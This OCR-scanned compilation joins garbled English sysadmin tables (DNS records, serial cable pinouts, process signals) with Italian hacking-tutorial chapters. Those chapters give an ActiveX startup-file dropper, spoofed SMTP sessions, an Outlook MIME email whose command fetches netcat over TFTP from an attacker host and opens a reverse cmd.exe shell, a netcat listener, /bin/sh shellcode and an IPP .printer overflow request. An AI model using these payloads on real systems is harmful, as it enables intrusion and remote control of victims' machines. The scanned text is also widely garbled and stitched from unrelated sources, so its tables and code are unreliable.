by sen d ma i I in add ress test mode (send mail -fcrtj. 



DNS RECORD TYPES 



Tyi>e 


Syntn 


SOA 


zone [ft/] IN SOA prima ry admin seria! 




refrain refry expire min 


NS 


zone [tu'] IN NS tosi 


A 


hostname [tfJ] IN A ipaddr 


PTR 


ipaddr [ni] IN PTR hostname 


MX 


hostname [tti] IN MX pref hosr ... 


CNAME 


nkkname [tti] IN CNAME hostname 


RP 


hostname [ttJ] IN RP admin txt 


T,xT 


name [rr/] IN TXT tert ... 



In SOA r pnimavy Ì5 the IP address of the primary name server, 
and adtiiin is the email address of the admin istradar with the 
<ss replaced by a period. 

The last four values are timoouts in seconds. Seconda ries 
check in even/ refresh seconds; if the primari' cannot be 
contacted, the secondarie^ try again every retry seconds. 
After empire seaonds, a secondary will stop trying. min is the 
default time-to-live (tt!) for ali recoids. 

We suggest the folloii'ing values: 

.'efresh 2 1 600 (6 hours} 

fetiy 1800 (30 min utesi 

expi.'s 1209600 (2 vveeks) 

min 432000 (5 dayts) 

In RR admin is the administrators email address (similarly 
encoded), and txt is the name of a TXT record (or set of TXT 
records) that contains further informati on. 

Remember to update the SOA 5 serial field vvhenever you 
modify a zones configuration files. 
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DB-25 TO DB-25 RS-232 CONNECTIONS 



Legend Straight Nulled 



Frairva grjjrd 


FG 


TransinHtad data 


1D 


Ramlrad data 


RD 


Rcqucst ta sund 


RTS 


Cluar to sund 


CTS 


Data sat rady CSR 


Sigiai crc'jrd 


SE 


Data carrtar data et 


DCD 


Data tunntial ready 


DTR 





1 






1 




2 
3 




1 x 


ì 

3 


1 

E 


4 

5 






J 

S 




i 






£ 


i 

2 


■ 

1D 






y-0 



MINI DIN-8/DB-9 STRAI GHT CAB LE 5 



DIN-8 DB-9 DB-25 Signal and function 



J, 


"i 

il 


-i 

^1 


TD 


Tran siti itte ti data 




3 


3 


RD 


Received data 


•■■ 


.?. 


4 


RTS 


Request to send 


2 


7 


5 


CTS 


C bar te senti 




6 


■'■ 


DSR 


Data sol ready 


i,B 


? 


7 


SG 


Signal ground 


1 


4 


A 


DCD 


Data carrier detect 


1 


1 


2'j 


DTR 


Data termina 1 ready 



FOUR-PAIR UTPWIRING FOR RM5 



Pair Colors 



Wired to 



Diagram 



1 White.'Blue Pins 4/5 

2 Wh ite/Ora li cje Pins l. ''6 

3 White.'Green Pins 1/2 

4 White.'Brown Pins 7:3 



TOP 



a. This scheme neflects the TIA/EIA-568A standard. 



PINOUTS FOR SERIAL CONNECTORS 



RJ-45 DB-9 Imak) 



Top 
Vlew 



O, O, 0, 0« 



Mini DIN-8 [mal«] DB-25 {male} 
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CONTROLLING RUNNING PROCESSES 



Pro< 


O|>erationi 


Command 


CI Ufi 


R9f9acl crontab (BSD) 


kill 


-HUP piò 


<jat<?<l 


Reread config file 


kill 


-HI.JP pid 




Dump current state 


kill 


■INT pid 




Graceful shutdown 


kill 


-TERM pid 




Toggle trac in g 


kill 


-US RI pid 




Check net interfaces 


kill 


-USR2 pid 


inetd 


Reread config file 


kill 


-HUP pid 


ini t 


Gq to single- user mode 


kill 


-TERM 1 


(BSD) 


Reread terminal config 


kill 


-HUP 1 


ini t 


Go to single- user mode 


telinit S 


(Sys V) 


Change run level 


telinit l'eveì 




Reread inittab file 


telinit -q 


nani ed 


Reread config files 


kill 


-HUP pid 




Dump DB and cache 


kill 


-INT pid 




Dump stati 


kill 


-IOT pid 




Dump stats (some OSs!' 


kill 


■A BRI pid 




Dump database files 


kill 


-TERM pid 




Incrernent debug level 


kill 


-USR1 pid 




Turn off debugging 


kill 


-USR2 pid 




Toggle query logging 


kill 


-WINCH pid 
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L'hacking verso i client di rete 

Quasi sempre quando si parla di hacking si pensa ad attività abusive svolte da utenti remoti 
nei confronti di servers connessi ad una rete ad accesso pubblico come ad esempio internet. 
Questo di fatto non è del tutto corretto in quanto esistono diverse metodologie che 
permettono di creare problemi anche in senso inverso. 

Molti sono convinti che gli hacker possiedano la bacchetta magica che gli permette di entrare 
abusivamente nei sistemi remoti in pochi istanti. 

Nulla di più sbagliato in quanto hackerare un sistema significa in genere impiegarci molto 
tempo suddiviso tra quelle che sono le fasi classiche di questa attività e precisamente : 

1 L' individuazione, l' analisi e la raccolta d' informazioni (IP 
attivi, host in funzione, servers, struttura domini, utenti dei 
sistemi, ecc.) 

2 li' individuazione del metodo d' attacco ( ricerca nei database dei 
bugs dei softwares, individuazione dei programmi, ecc.) 

3 Messa in atto della sequenza di operazioni per accedere al sistema. 

4 Consolidamento del proprio accesso ed eliminazione delle tracce. 

I normali navigatori a causa delle loro caratteristiche temporanee come ad esempio IP 
assegnati dinamicamente dal provider come Tiscali o Tin, sono vittime più difficilmente 
individuabili dato che generalmente offrono meno tempo per eseguire gli attacchi di quanto in 
effetti lo offra un sistema fisso sulla rete, anche se poi di fatto queste caratteristiche non 
permettono di evitare completamente i pericoli ma solo al limite di ridurli. 
Da un altro punto di vista gli utenti saltuari possiedono pericoli maggiori di quelli fissi proprio 
per il fatto che in genere le soluzioni adottate sono meno professionali di quelle degli utenti di 
servers professionali internet. 

Per fare qualche esempio di quello che dico possiamo riportare i firewalls i quali non 
dispongono delle caratteristiche che possiedono alcuni di tipo hardware come i Cisco o i 
Sonicwall. 

Senza contare che anche la cura dei sistemi professionali in genere ha come caratteristica 
una maggiore 'professionalità' di quanto la possiedano in genere i sistemi casalinghi e quindi 
anche una maggiore attenzione agli annunci dei vari problemi riscontrati sui sistemi operativi 
e sui software usati per la gestione dei servers. 

Un altro esempio è legato ad alcuni pacchetti come ad esempio ICQ o MIRC i quali 
forniscono protocolli nuovi che rappresentano canali veicolanti per certi tipi di exploits. 
Inoltre l'uso di certi software client per la gestione delle mail rendono maggiore il rischio di 
ricezione di messaggi con troiani, programmi virus e cosi via. 

Gli utenti di internet si stanno comunque evolvendo diventando sempre più sensibili ai 
problemi delle sicurezza dei loro sistemi, proteggendoli mediante l'adozione di piccoli 
software di firewalls e antivirus. 

Le classi di problemi che possono coinvolgere i sistemi client sono essenzialmente : 

1 . Pagine WEB pericolose 

2. Email con contenuti dannosi 



Il primo tipo di problema potrebbe dipendere da moltissime cose come ad esempio 
dall'inclusione di codice scritto in un qualsiasi linguaggio di script, Java Script in genere, 
all'interno di pagine WEB. 

Generalmente i softwares come i browser e i sistemi operativi viaggiano forniti dei metodi 
adatti alla protezione da certi tipi di attacchi solo che questi sistemi diventano sempre più 
complessi, oltre a diventare come numero di opzioni sempre maggiore, per cui il rischio è che 
le persone ignorino i settaggi lasciando le opzioni di default. 

Ad esempio alcuni tipi di virus usano la metodologia di propagazione legata alle pagine WEB. 
All'interno di una pagina HTML è possibile trovare le inclusioni di qualche file .js (Java Scipt) 
contenente codice pernicioso. 

Per questo motivo è sufficiente giungere navigando su una di queste pagine per installare sul 
proprio sistema il lettore che scatena il processo di caricamento dei virus. 
Probabilmente molti linguaggi di script usati nelle pagine WEB non possiedono la possibilità 
di creare direttamente problemi come ad esempio quelli legati alla scrittura diretta su dischi o 
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cose di questo tipo, ma comunque sono in grado di attivare metodi di trasferimento, come ad 
esempio TFTP, o altri metodi che sfruttano l'email per l'installazione sui sistemi di programmi 
pericolosi. 

Oltre ai linguaggi un pericolo è costituito dall'uso dentro a pagine WEB di files ACTIVEX i 

quali vengono inseriti all'interno della pagine HTML mediante le specifiche offerte dal tag 

<OBJECT> il quale permette di specificare da dove il controllo deve essere letto. 

Gli oggetti ActiveX generalmente utilizzano il sistema Authenticode di Microsoft per la verifica 

e la garanzia d4ell'autenticità del codice che viene installato sulla macchina client. 

Purtroppo a causa di un bugs di Internet Explorer è possibile in molti casi superare questo 

sistema di protezione. 

Inserendo all'interno dei proprio oggetti un flag chiamato "safe for scripting" lo sviluppatore 
poteva richiedere di evitare questo meccanismo. 

Ad esempio il seguente codice inserito dentro ad una pagina html potrebbe scrivere su di un 
sistema remoto un file di testo eseguibile con estensione .HTA (HTML Application) il quale 
verrebbe eseguito ad ogni reboot successivo. 

<object ld="scr" classld=" clsld: 06290BD5-48AA-11D2-8432-006008C3FBFC" > 

</object> 

<scr±pt> 

scr . Reset () ; 

scr . Path=" C : \ \windows\ \Start Menu\ \Programs\ \StartUp\ \test . hta" ; 

scr . Doc=" <object ±d=' wsh' classid:F935DC22-lCF0-llD0-ADB9-00C04FD58A0B' > 

</object> 

<script>alert ( y Ciao. Sei stato attaccato.'); 

wsh . Run ( 1 c : \ \ command . coiti' ) ; 

</"+"SCRIPT>" ; 

scrwrite () ; 

</script> 

</object> 

I problemi maggiori comunque dipendono quasi sempre da metodi che sfruttano le email. 
Molti mail servers eseguono la spedizione di messaggi senza eseguire particolari controlli sul 
mittente che ha inviato il tutto. 

Mediante una connessione eseguita con un mail server tramite TELNET sulla porta 25, 
equivalente alla porta SMTP, è possibile inviare delle email anonime contenenti metodi 
particolari atti ad attaccare i client internet. 

Un esempio di mail inviata digitando manualmente i dati potrebbe essere quella che segue. 
Una volta eseguita la connessione con 

C: \>telnet ip_smtp_server 25 
è possibile digitare : 
helo microsoft . com 

mail from: < dapartemia@dovesono . it > 
rcpt to: <vittima@suodominio . com > 
data 

subject : Leggi questo ! 
Importance: high 
MIME-Version : 1.0 

Content-Type : text/html; charset=us-ascii 

Content-Transfer-Encoding: 7bit 

<html> 

<h2>Ciao</h2> 
</html> 

quit 

Mediante un piccolo trucco è possibile inviare un file collegato al messaggio inserendo una 
altra specifica MIME all'interno del testo. 
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Il miglior metodo per eseguire questa funzione è quella di usare un utility chiamata mpack la 
quale aggiunge automaticamente l'header MIME appropriato. 

Nell'esempio seguente un file chiamato prova.txt viene codificato ed inserito in un file 
denominato file.mim 

C:\> mpack -s Nasty-gram -o file.mim prova.txt 

La parte MIME cosi creata viene inserita all'interno di un messaggio in formato HTML. 
I delimitatori MIME sono preceduti da doppi trattini. 

Fate attenzione a dove questi delimitatori vengono inseriti in quanto questo fa si che le 
porzioni MIME vengano interpretate in modo diverso a seconda della loro posizione. 

helo microsoft . com 

mail from: < dachivuoi@miodominio . it > 
rcpt to: < nomevittima@dominio . it > 
data 

subject : Leggimi ! 
importance: high 
MIME-Version : 1.0 
Content-type : multipart/mixed; 
Boundary=" _boundaryl_ " 
— _boundaryl_ 

Content-type : multipart/aletrnative; 
Boundary= " _boundary2_ " 
— _bo unda ry2_ 

Content_type : text/html; charset=us_ascii 
<html> 

<h2>Ciao></h2> 
</html> 

— _ bo un da ry2_ — 
— _boundaryl_ 

Content-type: application/octet-stream; name=" prova . txt" 
Content-ID: <5551212> 
Content-Transfer-Encoding: base 64 

Content-Disposition: inline; filename=" prova. txt" 
Content-MD5 : Psn-moJEvOfPwoEc40XYTA== 
SSBjb3VsZGEgaGFja2VkIHlhIGJhZCANCg== 
— _boundayl — 

quit 

I metodi visti mediante I quali è possibile specificare delle parti MIME di un messaggio 
permettono di eseguire codice su di un sistema remoto tramite email. 

Infatti il precedente metodo potrebbe essere utilizzato per eseguire un attacco ad un sistema 
client. 

II metodo è quello che segue. 

Supponiamo di voler attaccare un sistema remoto che disponga di Windows 2000 e sul quale 
la posta viene letta dalla vittima tramite OUTLOOK. 

Partiamo anche dal presupposto che il firewall usato dalla vittima permetta di usare protocolli 
come FTP e TFTP. 

Il nostro obbiettivo è quello di uplodare su questo sistema tramite TFTP il sistema NETCAT il 
quale verrà successivamente utilizzato per aprire una shell. 
Il comando da dare dovrebbe essere : 

start /B tftp -i attaccante.it get nc.exe c:\winnt\system32\nc.exe A && start /B ne -d -e 
cmd.exe attaccante.it 80 

Questo comando viene eseguito senza essere visto sotto Windows 2000in modo 
completamente trasparente. 
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L'attaccante prepara il metodo per aprire questa shell creando un messaggio che deve 
disporre di determinate caratteristiche per l'esecuzione di sezioni MIME. 
Chiamiamo questo file cmd.txt e scriviamoci dentro quello che segue : 

He lo microsoft . com 

Mail from : <chisonoio@miodominio . com > 
Rcpt to: <vittima@dominio . it > 
Data 

Subject : Leggimi ! 

Date: Thu, 2Dec 2002 13:27:33 +0100 

MIME-Version : 1.0 

Content-Type : multipart/related; 

type=" multipart /alternative" ; 

boundary-' 1 " 
X-Priority : 3 
X-MSMail-Priority: High 
X-Unsent: 1 

— 1 

Content-type : multipart /alternative ; 
Boundary= "2" 



—2 

Content-type: ext/html; 

Charset=" iso-8859-1" 
Content-Transfer-Encoding: quoted-printable 

<html> 
<head> 
</head> 

<BODY bgColor=3D#ffffff> 

<iframe src=3Dcid: THE—CID height=3D0 width=3D0></iframe> 

Questo messaggio usa un set di caratteri che non è supportato dai 

servizi internet . <br> 

</BODY> 

</HTML> 



— 2— 
— 1 

Content-Tytpe : audio / 'x-wav ; 

name=" re . bat" 
Content-Transfer-Encoding : quoted-printable 
Content-ID: <THE-CID> 

start /B tftp -i attaccante.it get nc.exe c: \winnt\system32\nc.exe* 
&& start /B ne -d -e cmd.exe attaccante.it 80 

— 1 



quit 

Come avrete visto l'attaccante ha sostituito il comando per aprire la shell al posto della 
stampa della scritta Ciao che faceva, mo stampare nell'esempio all'inizio di questo testo. 
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L'uso della porta http, quella 80, ha come scopo quello di passare inosservato sotto gli occhi 
di un firewall i quali generalmente permettono il dialogo con questo protocollo. 
Quando il messaggio verrà ricevuto e letto tramite OUTLOOK il trasferimento tramite TFTP 
verrà iniziato. 

L'esecuzione dell'attacco a questo punto deve prevedere un certo numero di azioni da parte 
dell'attaccante e precisamente : 

1 Lanciare TFTP sul suo sistema in una directory dove questo tiene 
netcat (nc.exe) 

2 Aprire una controparte NETCAT con 
c:\> ne -w -1 -p 2002 



3 Convogliare il messaggio al destinatario tramite un mail server che 
non esegua il controllo del mittente con : 




In pratica il testo che abbiamo scritto dentro al file cmd.txt viene inviato al mailserver tramite 
una pipe eseguita con netcat attivato su un certo server mail. 

Come abbiamo detto prima, appena la vittima legge il messaggio il trasferimento TFTP viene 
eseguito e quindi viene aperta una shell che possiede i privilegi relativi a chi ha di fatto letto 
l'email. 

Per evitare questo tipo di problemi cercate di aggiornare sempre il vostro sistema operativo 
con l'ultimo SERVICE PACK e di installare le varie hotfix che le case come Microsoft fanno 
uscire regolarmente. 

Il contenuto del file cmd.txt che abbiamo preparato prima potrebbe essere modificato per 
controllare se il nostro sistema è vulnerabile a questo problema. 

Invece di mettere il codice che attiva il trasferimento avremmo potuto metterci una semplice 
richiesta di mostrare la directory: 

echo off 
dir c: \ 

echo II vostro sistema è vulnerabile ! 



Se leggendo il messaggio vi viene mostrata la directory del vostro disco C: e viene stampata 
la stringa allora il sistema è vulnerabile e quindi dovrete prestare attenzione alle email lette. 
Nell'ambito dell'hacking dei sistemi client è necessario anche tenere in considerazione alcune 
regole che riguardano la configurazione dei sistemi server. 

Alcune volte l'uso di software come ICQ o altri utilizzanti i vari canali IRC permettono ad 
alcuni utenti partecipanti di risalire agli indirizzi di altri utenti. 

Una volta ottenuti questi indirizzi è in pratica possibile cercare di utilizzare le varie 
metodologie di attacco usate per i servers fissi. 

Uno dei problemi maggiori potrebbe essere legato alla condivisione di risorse non protette. 
Mediante i comuni comandi per la gestione delle risorse di rete quali nbtstat, net e altri è 
possibile collegarsi da remoto a risorse presenti sul sistema di un utente connesso alla rete. 
Inoltre parlando di client possiamo supporre che possano anche trattarsi di sistemi come 
Win98, WinMe o comunque di sistemi che non dispongono di meccanismi molti sofisticati per 
le gestioni multiutente come ad esempio il sistema di logon alla console offerta da Win9x. 
Sistemi come Outlook inoltre possiedono diversi problemi legati a quelli definiti con il termine 
di buffer overflow. 
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Come ti dico di fare quello che non dovresti fare. 

Nel volume è stato trattato questo argomento ma partendo già dal presupposto che le 
persone conoscessero già alcuni concetti. 

Qui mi sono riproposto di riprenderlo usando un metodo per descriverne i principi che possa 
essere chiaro anche a chi di fatto i capitoli del volume su questa argomentazione fossero stati 
eccessivamente pesanti o incomprensibili. 

Tutti quelli che si sono interessati di problemi di sicurezza hanno potuto vedere come spesso 
il fatto di abusare di un sistema remoto sia di fatto dovuto alla presenza di bugs all'interno dei 
sistemi operativi o dentro ai softwares che gestiscono le varie funzionalità dei servers come 
ad esempio quelli WEB e Mail. 

Il controllo costante da parte degli amministratori di sistema, in funzione delle eventuali 
segnalazioni e quindi del rilascio delle patchs da applicare ai propri software, permette di 
limitare le possibilità di accessi abusivi all'interno dei sistemi informatici connessi su rete. 
In ogni caso esiste una delle tecniche considerate più avanzate che permette di aggiungere 
del codice da eseguire ai programmi che gestiscono le funzionalità di rete o ai sistemi 
operativi stessi. 

Questa metodologia è quella conosciuta con il termine di buffer overflow ovvero una tecnica 

orientata a inserire dentro ad un buffer più dati di quanti questi possano contenere. 

In genere questa tecnica potrebbe essere orientata a due scopi particolari. 

Il primo è quello di creare dei blocchi all'interno dei programmi di gestione dei servers mentre 

il secondo è quello legato all'inserimento di parti di codice abusivo da fare eseguire per creare 

delle porta d'accesso all'interno dei sistemi in rete. 

Fortunatamente per riuscire ad applicare queste tecniche si devono possedere nozionismi 
legati alla teoria dei sistemi e a quella dei linguaggi di programmazione che solo pochi 
hackers possiedono. 

Da che cosa deriva questa metodologia di attacco utilizzata dagli hackers più evoluti ? 

Per poterla vedere è necessario prima dare un occhiata ad alcuni concetti chiave legati alla 

programmazione in senso generale. 

Come tutti sapranno i nostri sistemi informatici eseguono istruzioni operative legate a dei 
microprocessori specifici come ad esempio i Pentium montati sui nostri PC. 
Queste istruzioni eseguono manipolazioni delle informazioni chiamate in gergo con il termine 
di dati. 

Qualsiasi cosa noi facciamo con il nostro computer di fatto è creato mediante manipolazioni 
delle informazioni, movimentazioni di dati dalla memoria alla CPU e viceversa e trasferimenti 
di dati tra la memoria e le periferiche di INPUT/OUTPUT, come ad esempio la scheda video o 
un disco fisso. 

In ogni caso sia le istruzioni operative che eseguono queste operazioni, quelle che il 
processore è in grado di eseguire, sia i dati stessi sono mantenuti in memoria come BYTES i 
quali possono essere visti come sequenze di numeri memorizzati sequenzialmente. 
I valori che rappresentano le istruzioni sono di fatto costituiti da quelli definiti con il termine di 
OPCODE i quali sono stabiliti dai progettisti dei processori e costituiscono il bagaglio 
funzionale del processore stesso ovvero il suo patrimonio operativo. 

Quello che chiamiamo linguaggio ASSEMBLER è già di fatto una rappresentazione 
mnemonica, già più simile al nostro linguaggio naturale, di quelli che sono di fatto i numeri 
che costituiscono il codice binario della macchina. 

Quando con un disassemblatore o con un debugger andiamo a vedere il codice di un 
programma vedremo sia i numeri che rappresentano gli OPCODE che il formato assembler 
ovvero le microistruzioni visualizzate in un formato già più comprensibile. 



INDIRIZZO 


OPCODE 


ISTRUZIONI IN 


ASSEMBLER 


005CC002 


E8 03000000 


CALL Wincmd32. 


005CC00A 


005CC007 


E9 EB045D45 


JMP 45B9C4F7 




005CC00C 


55 


PUSH EBP 




005CC00D 









Nell'esempio di prima il numero più a sinistra è l'indirizzo di memoria a cui ci si riferisce. 

I numeri a fianco sono i codici operativi che poi nella parte più a destra vengono visualizzati 

come istruzioni assembler. 

Volendo vedere la sequenza di bytes in memoria avremmo : 
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005CC002 

005CC003. 

005CC004 . 

005CC005. 

005CC006. 

005CC006. 

005CC007. 



[E8] 
[03] 
[00] 
[00] 
[00] 
[E9] 
[EB] 



La memoria in cui le istruzioni e i dati vengono inseriti sono organizzati i blocchi logici 
chiamati segmenti di memoria. 

Ciascuno segmento contiene una tipologia di numeri relativi al codice e ai dati. 

Ad esempio il codice viene inserito dentro a quelli definiti con il termine di CODE SEGMENT 

o segmento di codice mentre i dati dentro ai DATA SEGMENT o segmento dati. 

Detto in modo molto semplice il processore userà i 'numeri' dentro ai segmenti come codici 

da eseguire mentre quelli dentro ai segmenti di dati verranno manipolati dalle istruzioni 

eseguite. 

Ad esempio la seguente istruzione assembler muove un dato dalla memoria ad un registro 
interno al processore : 



MOV EAX, [00401234] 



Esistono altri segmenti tra i quali uno che viene utilizzato per funzioni varie chiamato con il 
nome di STACK SEGMENT. 

Questo è una struttura di dati che contiene importanti informazioni legate ai processi che 
girano in memoria. 

In pratica questo segmento è una zona di memoria gestita come lo spunzone delle 
consumazioni dei bar in cui i biglietti inseriti come primi sono gli ultimi a uscire, conosciuto 
informaticamente con il termine di LIFO ovvero 'last input first output', in italiano 'ultimo 
inserito primo ad uscire. 

Come abbiamo detto prima i programmi sono considerati sequenze di istruzioni che il 
processore deve eseguire. 

Per semplificare l'organizzazione di questi e per poter definire dei gruppi di istruzioni 
indirizzate allo svolgimento di un certo compito, i linguaggi di programmazione permettono la 
creazione di quelle che sono definite con il termine di funzioni. 

In altre parole un certo numero di istruzioni specifiche di un linguaggio possono essere 
incapsulate dentro ad un contenitore virtuale chiamato funzione, le quali possono essere 
richiamate ogni volta che si desidera eseguirle, specificando solo il nome di questa. 
Ad esempio una funzione definita in linguaggio C indirizzata a sommare due numeri passati 
come argomenti e a restituire il valore della somma potrebbe essere : 



int funzionesomma (int a, int b) 
i 

int risultato; 
risultato = a + b; 




Una programma potrebbe essere visto come una raccolta di certo numero di funzioni 
ciascuna indirizzata a svolgere un determinato compito. 

Visto questo concetto per potere comprendere lo scopo dello STACK SEGMENT è 
necessario vedere ancora due punti. 

Il primo è relativo al posto dove le variabili usate dai programmi possono essere definite. 
Visto che un programma può contenere diverse funzioni, le variabili possono essere 
dichiarate fuori da queste oppure al loro interno. 



int variabile_globale; 
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// i punti del programma. 

int funzione somma (int a, int b) 
{ 

int variabilejocale; 

// Viene vista solo dentro alla funzione e lo spazio 

// occupato in memoria da questa viene rilasciato 

// all'uscita della funzione. 

> 



Le variabili globali, quelle definite fuori da tutte le funzioni, vengono inserite in memoria dentro 
ai DATA SEGMENT mentre le variabili definite all'interno di una funzione vengono allocate in 
memoria dentro a quello definito come STACK SEGMENT il quale generalmente possiede 
una dimensione abbastanza piccola. 

L'ultimo concetto che ci permetterà di vedere l'altro scopo per cui viene usato lo STACK è 
legato al fatto che che un programma potrebbe essere visto come una sequenza di istruzioni 
tra le quali possono esserci anche chiamate da una funzione ad un'altra partendo da una 
funzione principale chiamata main(). 



Programma 



INIZIO 



void funsi onel ( ) 

{ 

char buffer [10] ; 
- return; 



~^ void aain ( ) 
{ 



} 



funsi onel ( ) 



STACK 



buffer [10] 

variabile 

locale 



frane PTR 



indirizzo di 
ritorno 



base 
memoria 



cima 
memoria 



Quando viene trovata una chiamata ad una funzione, la quale si trova in certo punto della 
memoria, il processore memorizza dentro allo STACK SEGMENT l'indirizzo di memoria di 
dove è stata fatta la chiamata e salta come esecuzione al punto dove la funzione stessa si 
trova. 

Facendo in questo modo quando la funzione termina il processore può prelevare l'indirizzo 
dallo STACK e proseguire l'esecuzione dal punto dove era stata fatta la chiamata 
proseguendo in questo modo il suo flusso. 

A questo punto possiamo dire che dentro alla stack possono esserci i valori delle variabili 
locali alle funzioni , gli indirizzi di ritorno dalla chiamate alle funzioni ed in più un valore 
chiamato puntatore allo stack frame. 

Dichiarare una variabile significa riservare in memoria un certo numero di bytes nei quali 
verranno inseriti dal programma i valori che devono esser gestiti. 

Supponiamo di voler leggere una stringa chiamando una funzione che esegue una lettura da 
tastiera mettendo i dati dentro ad una variabile locale. 



void leggistringa(void) 
{ 

char datiricevuti [100] ; 
gets (datiricevuti) ; 
printf C" %s" , datiricevuti) ; 



// Il buffer dove mettere i dati 
// Legge i dati da tastiera 
// Stampa i dati letti 



char main (void) 
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leggistringa () ; // Chiama la funzione che legge i 




All'interno dello stack, quando il programma arriverà ad eseguire la funzione di lettura da 
tastiera gets(), ci sarà : 



dat i r i c e vut i [ 0 ] 
dat i r i c e vut i [ 1 ] 
dat i r i c e vut i [ Z ] 



dat i r i c e vut i [ 3 ] 



dat i r i c evut i [ 4 ] 



dat i r i c evut i [ 5 ] | 

) ) 

datiricevuti [ 99 ] 



stack fraine 



stack frane 
indirizzo di ritorno 



indirizzo di ritorno 



Questo significa che se non controllassimo il numero di bytes inseriti dentro al buffer 
potremmo andare ad invadere la zona di memoria in cui esiste il valore di ritorno. 
Proviamo a farlo appositamente andando ad inserire su questo valore l'indirizzo di una 
funzione che non viene mai chiamata dal programma. 

#include <stdio.h> 

char buffer[24]; 

void funzione2(void) 
{ 

printf("\nQuesta funzione non la chiama nessuno direttamente"); 
exit(O); 

} 

void funzionel (void) 
{ 

char b[10]; 

sprintf(buffer, "abcdefghiOO%d",((unsigned int) &funzione2)&& Oxffff); 
printf("\nll buffer contiene : %s lungo %d", buffer, strlen(buffer)); 
strcpy(b, buffer); // Ora copiamo sconfinando 

} 



void main() 
{ 

funzionel (); 

printf("\nQui non ci ritorna"); 

} 

Cosa abbiamo fatto ? 

L'array b dentro a funzionel () viene allocato dentro allo stack segment e occupa 10 bytes. 
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Dopo questi bytes esiste nello stack l'indirizzo dello stack trame pointer di 2 bytes e poi i due 
bytes dell'indirizzo di ritorno dalla chiamata alla funzione funzionel (). 

Dentro a un buffer più grande creiamo una stringa di un certo numero di bytes sufficienti a 
riempire la variabile b, due bytes atti a coprire lo stack trame pointer e alla fine di questo, per 
due bytes oltre mettiamo l'indirizzo di una seconda funzione la quale direttamente non viene 
chiamata da nessuna parte. 

Questi due bytes aggiuntivi sconfineranno dallo spazio della variabile b e andranno a scrivere 
sopra all'indirizzo di ritorno per cui dopo che viene eseguita la chiamata a funzionel () il 
programma non tornerà più a quel punto ma al contrario verrà richiamata funzione2(). 
Compilando ed eseguendo avremo : 

F:\>cl test.c 

Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 12 . 00 . 8804 for 
80x86 

Copyright (C) Microsoft Corp 1984-1998 . Ali rights reserved. 
test . c 

Microsoft (R) Incrementai Linker Version 6.00.8447 

Copyright (C) Microsoft Corp 1992-1998 . Ali rights reserved. 



/out : test . exe 
test . obj 



F: \>test 



Il buffer contiene : abcdefghil004096 ed e' lungo 16 
Questa funzione non la chiama nessuno direttamente 



Fino a questo punto abbiamo visto come mediante un programma scritto appositamente 
siamo andati a soprascrivere l'indirizzo di ritorno di una funzione di una programma. 
Supponiamo ora che all'interno di un programma qualsiasi che gestisce un server da qualche 
parte venga richiesto un input e che la quantità di dati fornita dall'utente non venga controllata 
come lunghezza ma semplicemente copiata dentro ad un buffer in memoria che possiede una 
dimensione prestabilita. 

Se noi invece di fornire un input corretto scrivessimo un piccolo programmino che attiva una 
shell come potrebbe esserlo : 



^include <stdio.h> 



void main () { 

char *name [2] ; 

name[0] = "/bin/sh"; 

name[l] = NULL; 

execve (name[0 ] , name, NULL) ; 



A questo punto lo facciamo compilare dopo averlo tradotto in assembler: 



mov ecx.esp 
xor eax, eax 
push eax 
lea ebx,[esp-7] 
add esp,12 
push eax 
push ebx 
mov edx.ecx 
mov al, 11 
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Con questo codice prendiamo gli OPCODE, i codici operativi, e creiamo un stringa di numeri 
composta da: 

[ codici operativi del programmino della shell] [indirizzo di ritorno] 
[. . NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ] 

dove 

NOP = NULL INSTRUCTION 

SHELL CODE = codice in esadecimale del programmino della shell 
RET = codice di ritorno da sostituire 

Chiaramente dovete pensare che se l'indirizzo di ritorno che sostituiamo puntasse ad una 
istruzione sbagliata il sistema si bloccherebbe. 

Nell'assembler del PENTIUM esiste l'istruzione NOP che fa si che il processore la salti non 
facendo nulla. 

Inserire un certo numero di NOP aumenta le probabilità di indovinare che il valore di ritorno 
che andiamo a sostituire cada in una zona dove non capitino danni. 

Se l'indirizzo settato facesse saltare il programma su una di queste istruzioni il processore 
passerebbe avanti fino alla prossima istruzione. 

char lunixshell [] = 

"\xeb\xld\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x$ 
" \xOb \x8 7 \xf3 \x8d\x4b \x08 \x8d\x53 \xOc \xcd\x80 \x29 \xcO \x40\x$ 
» \x80 \xe8 \xde \xff\xff\xff /bin/sh "; 

La stringa di prima contiene il codice del programma che apre una shell ed in più contiene il 
valore di ritorno il quale farà eseguire il salto al codice stesso. 

A questo punto vi chiederete come gli hackers fanno a sapere dove passare queste stringhe 
? 

I problemi sono legati all'uso dentro ai software di funzioni che non controllano la lunghezza 
dei dati copiati come le funzioni di gestione delle stringhe del linguaggio Cò. 
Ad esempio : 

strcpyO 
gets () 
getws () 

Di molti programmi, come ad esempio Sendmail per la gestione dei mail server, sono 

distribuiti i sorgenti per cui il fatto di andare a cercare dove potrebbe essere possibile 

eseguire un overflow del buffer è soltanto legato all'analisi dei sorgenti stessi. 

Di altri programmi di cui non si dispone dei sorgenti è possibile farlo mediante debugger e 

disassemblatori. 

Ad esempio in ambiente WINDOWS uno dei più famosi buffer overflow è quello conosciuto 
con il nome di IPP BUFFER OVERFLOW. 

Se con TELNET viene aperta una connessione su un determinato HOST usando la porta 80 
legata al protocollo http è sufficiente inserire un buffer di 420 BYTES. 

C:\>telnet idirizzo_host 80 

A connessione eseguita si digita : 

GET /NULL.printer http/1.0 
Host: [buffer di 420 bytes] 

CR 



Le società che producono software, come Microsoft ad esempio, hanno capito i problemi 
legati a questa tecnica per cui hanno revisionato profondamente i software mentre altre case 
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come la EEYE hanno creato plugins per i software che gestiscono i servers WEB che 
eseguono controlli sullo stack. 

Ad ogni modo i softwares usati nelle gestioni dei processi sui servers sono moltissimi a partire 
da quelli legati ai protocolli per arrivare ai linguaggi e ai gestori di filtri come ad esempio nel 
caso delle ISAPI, per cui le probabilità di trovare buffers non controllati sono ancora 
elevatissime tanto che società che segnalano i problemi legati ai vari exploits possibili ne 
annunciano ogni giorno di nuovi. 
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SQL Server 

Spesso i sistemi di database vengono utilizzati connessi ai WEB in attesa che .NET ci liberi 
da questo sistema di interfacciamento che spesso costituisce un metodo aggiuntivo per 
creare danni nei confronti di WEB e servers http. 

In alcuni capitoli abbiamo visto come i dati inseriti dentro ai database potrebbero costituire 
una specie di cavallo di troia per riuscire a fare interpretare al sistema dei comandi inseriti da 
un utente remoto. 

